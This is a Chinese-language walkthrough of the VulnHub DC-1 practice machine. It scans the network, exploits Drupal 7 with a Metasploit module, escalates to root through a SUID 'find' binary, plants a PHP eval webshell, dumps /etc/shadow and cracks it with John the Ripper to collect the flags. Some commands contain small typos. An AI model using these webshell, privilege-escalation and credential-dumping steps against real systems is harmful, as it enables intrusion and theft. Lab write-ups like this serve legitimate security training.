镜像下载地址
https://www.vulnhub.com/entry/dc-1-1,292/
信息收集
1、可以使用netdiscover -i eth0 发现二层网络信息
发现两个设备(103是真实机)。其中105为目标机器。
2、端口发现
Nmap -A 192.168.1.105
发现三个端口 22 80 111
80为http则直接浏览器访问
3、web指纹发现
发现Drupal 版本为 7
准备web渗透
因为7版本存在漏洞 而且在msf中也有
Drupal漏洞
在网上找了一圈没找到可getshell的exp,因为msf里面有集成cms的利用模块,所以使用msf进行getshell,用search命令搜索,发现7个漏洞模块,这里我随便选择了一个(use 2)
Show option 只需要填写RHOSTS
Set RHOSTS 192.168.1.105
Run
获取shell与与提权
因为仅仅是一个session 所以无法whoami 直接使用getuid
提权方法--查找具有root权限的命令进行提权
发现是 www-data用户。那么就需要提权
首先需要有session切换成shell
然后查找具有suid的文件,让这些文件来执行命令进行提权
Find / -perm -u=s -ype f 2>dev.null
发现find命令具有root权限,那就touch一个1 用find提权
使用find 1 -exec ‘/bin/sh’ ; 进入高权限shell
然后再写个一句话木马方便链接
find 1 -exec echo '<?php eval($_GET[a]);'>123.php ;
这里使用单引号包含需要写入的内容。放置$_GET被转义
重新写下find 1 -exec echo '<?php eval($_POST[a]);'>123.php ;
内网信息获取
1、百度查找该CMS配置,可以找到配置文件路径。发现如下信息
2、这个不用看,数据库肯定不能远程链接, 直接蚁剑链接数据库
登陆即可产看到flag3
3、密码获取
cat /etc/shadow
使用join爆破一下
find /etc/shadow -exec cat {} ;>all,txt 导入到当前txt中,用蚁剑下载下来
john --wordlist=/usr/share/john/password.lst --rules all.txt 使用johun爆破一下password.list为默认密码
登陆之后更目录下获取flag4
根据提示使用find flag4.txt -exec ‘/bin/sh’ ;切换到root权限
根据提示进入/root
发现最后的flag